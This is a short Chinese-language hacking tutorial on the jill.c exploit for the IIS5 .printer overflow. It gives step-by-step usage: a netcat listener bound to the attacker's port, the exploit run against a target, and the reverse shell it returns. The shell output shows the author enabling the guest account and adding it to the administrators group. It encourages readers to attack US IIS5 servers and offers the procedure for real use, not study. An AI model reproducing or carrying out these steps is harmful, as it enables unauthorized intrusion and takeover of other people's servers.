TAG:
下 载:http://archives.neohapsis.com/archives/bugtraq/current/att-0024/01-jill.c 这个漏洞是由eEye发现的,现在网上已经出现了入侵的工具,jill.c就是其中之一,下面说说用法: 1,在类unix系统上编译jill.c,编译成功后看一下说明文档. 大致用法是: #./jill <目标主机> <目标iis5服务端口> <攻击者主机> <攻击者绑定端口> 以上没什么好说明的,主要就是这个攻击者的绑定端口.这个是什么意思呢? 下面说来 2,在本地用nc绑定cmd.exe到任意端口 用法是: D:\\>nc -l -p xxx -vv listening on [any] xxx ... 这个xxx就是你想绑定的端口了,绑定以后就可以试试入侵了.挑个霉国的iis5机器. 3,绑定cmd.exe,开始入侵 绑定 D:\\>nc -l -p 199 -vv listening on [any] 199 ... 入侵 # ./jill xxx.xxx.xx.xx 80 xx.xxx.xx.xx 199 iis5 remote .printer overflow. dark spyrit / beavuh labs. connecting... sent... you may need to send a carriage on your listener if the shell doesn't appear. have fun! 上面的199就是我绑定的端口啦!看看 D:\\>nc -l -p 199 -vv listening on [any] 199 ... xxx.xxx.xx.xx: inverse host lookup failed: h_errno 11004: NO_DATA connect to [xx.xxx.xxx.xx] from (UNKNOWN) [xx.xxx.xxx.xx] 3631:NO_DATA Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\\WINNT>net user guest /active net user guest /active The command completed successfully. C:\\WINNT>net localgroup administrators guest /add net localgroup administrators guest /add The command completed successfully. 嘿嘿!admin权限!什么不可以做到呢?:) (GoGo) |